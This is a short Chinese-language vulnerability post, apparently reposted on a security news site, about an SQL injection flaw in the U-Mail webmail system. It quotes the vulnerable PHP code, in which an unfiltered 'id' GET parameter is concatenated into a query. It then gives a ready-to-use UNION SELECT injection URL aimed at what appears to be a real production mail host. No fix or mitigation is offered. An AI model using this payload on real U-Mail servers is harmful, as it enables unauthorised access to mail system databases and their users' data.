U-Mail邮件服务系统最新版SQL注入漏洞

没穿底裤 2020年1月1日03:37:05评论1,207 views字数 599阅读1分59秒阅读模式
摘要

漏洞文件:client/option/module/views.php
[php]
if ( ACTION == "letterpaper" ) { $lp_id = gss( $_GET['id'] );

漏洞文件:client/option/module/views.php
[php]
if ( ACTION == "letterpaper" )

{

$lp_id = gss( $_GET['id'] );

if ( $lp_id )

{

if ( $lp_id == "add" )

{

$lp_info['letterpaper'] = "

";

}

else

{

$lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 );

}

}

else

{

$lp_list = $Widget->get_letterpaper( array(

"fields" => "*",

"where" => "UserID=0 or UserID=".$user_id,

"orderby" => "UserID",

"debug" => 0

) );

}

include( load_tpl( "op_letterpaper" ) );

}

[/php]
未过滤直接进入查询
[php]
$lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 );
[/php]
http://mail.comingchina.com/webmail/client/option/index.php?module=view&action=letterpaper&id=1%20and%201=2%20union%20select%201,2,3,user(),5,6,7,8

U-Mail邮件服务系统最新版SQL注入漏洞

U-Mail邮件服务系统最新版SQL注入漏洞
[php]

背景图片:

U-Mail邮件服务系统最新版SQL注入漏洞
[/php]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日03:37:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   U-Mail邮件服务系统最新版SQL注入漏洞http://cn-sec.com/archives/75817.html

发表评论

匿名网友 填写信息